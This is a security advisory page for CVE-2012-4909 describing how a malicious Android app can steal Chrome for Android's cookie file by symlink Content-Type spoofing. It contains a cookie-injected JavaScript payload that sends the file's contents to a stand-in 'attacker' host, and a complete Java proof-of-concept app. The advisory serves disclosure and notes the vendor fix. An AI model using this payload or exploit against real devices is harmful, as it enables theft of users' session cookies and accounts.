what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Chrome For Android Cookie Theft

Chrome For Android Cookie Theft
Posted Jan 8, 2013
Authored by Takeshi Terada

Symbolic links can be used for spoofing Content-Type of local files and this enables malicious Android applications the ability to steal Chrome's cookie file. Version 18.0.1025308 was released to address this vulnerability.

tags | exploit, local, spoof
advisories | CVE-2012-4909
SHA-256 | 20dd3d870f049909a9ad1c797062381c1dafee9065f6baad9f3348dc65d0e398

Chrome For Android Cookie Theft

Change Mirror Download
CVE Number:         CVE-2012-4909
Title: Chrome for Android - Cookie theft from Chrome by malicious Android app
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 was released which fixes this vulnerability

Overview:
Symbolic links can be used for spoofing Content-Type of local files.
It enables malicious Android apps to steal Chrome's Cookie file.

Details:
When a local URI (file:///) of symlink is given to Chrome for Android
(v18.0.1025123), Chrome resolves symlink and load the content of the file
that the symlink is pointing to.

At the time of loading, Chrome does MIME sniffing by the extension of the
symlink, rather than that of the actual file which symlink is pointing to.

This behavior can be used for deluding Chrome into thinking that the Chrome's
private file (Cookie file) is HTML. When Chrome renders the Cookie file as HTML,
JavaScript in the Cookie file is executed.

Whole steps to steal Chrome's Cookie file are described below:

1. A malicious app create a symlink pointing to Chrome's Cookie file. The
extension of the symlink should be "html", which is a simple trick for
spoofing Content-Type.

2. The malicious app forces Chrome to load attacker's Web page. The Web page
sets a crafted Cookie which contains malicious HTML+JavaScript to steal
the whole content of the Cookie file:

Set-Cookie: x=<img><script>document.images[0].src='http://attacker/?'
+encodeURIComponent(document.body.innerHTML)</script>;
expires=Tue, 01-Jan-2030 00:00:00 GMT

The Cookie is stored in the Cookie file of Chrome.

3. The malicious app makes Chrome load the local URI of the symlink.
Then Chrome follows the symlink and renders the Cookie file as HTML,
because the extension of the URI (symlink) is "html".

It results in the execution of the attacker's JavaScript code that is
injected in the Cookie file. Attacker-supplied JavaScript read the whole
content of the Cookie file and send it to the attacker's server.

Proof of Concept:
package jp.mbsd.terada.attackchrome1;

import android.app.Activity;
import android.os.Bundle;
import android.util.Log;
import android.content.Intent;
import android.net.Uri;

public class Main extends Activity {
// TAG for logging.
public final static String TAG = "attackchrome1";

// Cookie file path of Chrome.
public final static String CHROME_COOKIE_FILE_PATH =
"/data/data/com.android.chrome/app_chrome/Default/Cookies";

// Temporaly directory in which the symlink will be created.
public final static String MY_TMP_DIR =
"/data/data/jp.mbsd.terada.attackchrome1/tmp/";

// The path of the Symlink (must have "html" extension)
public final static String LINK_PATH = MY_TMP_DIR + "cookie.html";

@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
doit();
}

// Method to invoke Chrome.
public void invokeChrome(String url) {
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
intent.setData(Uri.parse(url));
startActivity(intent);
}

// Method to execute OS command.
public void cmdexec(String[] cmd) {
try {
Runtime.getRuntime().exec(cmd);
}
catch (Exception e) {
Log.e(TAG, e.getMessage());
}
}

// Main method.
public void doit() {
try {
// Create the symlink in this app's temporary directory.
// The symlink points to Chrome's Cookie file.
cmdexec(new String[] {"/system/bin/mkdir", MY_TMP_DIR});
cmdexec(new String[] {"/system/bin/ln", "-s", CHROME_COOKIE_FILE_PATH, LINK_PATH});
cmdexec(new String[] {"/system/bin/chmod", "-R", "777", MY_TMP_DIR});

Thread.sleep(1000);

// Force Chrome to load attacker's web page to poison Chrome's Cookie file.
// Suppose the web page sets a Cookie as below.
// x=<img><script>document.images[0].src='http://attacker/?'
// +encodeURIComponent(document.body.innerHTML)</script>;
// expires=Tue, 01-Jan-2030 00:00:00 GMT
String url1 = "http://attacker/set_malicious_cookie.php";
invokeChrome(url1);

Thread.sleep(10000);

// Force Chrome to load the symlink.
// Chrome renders the content of the Cookie file as HTML.
String url2 = "file://" + LINK_PATH;
invokeChrome(url2);
}
catch (Exception e) {
Log.e(TAG, e.getMessage());
}
}
}

Timeline:
2012/08/06 Reported to Google security team
2012/09/12 Vender announced v18.0.1025308
2013/01/07 Disclosure of this advisory

Recommendation:
Upgrade to the latest version.

Reference:
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=141889
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close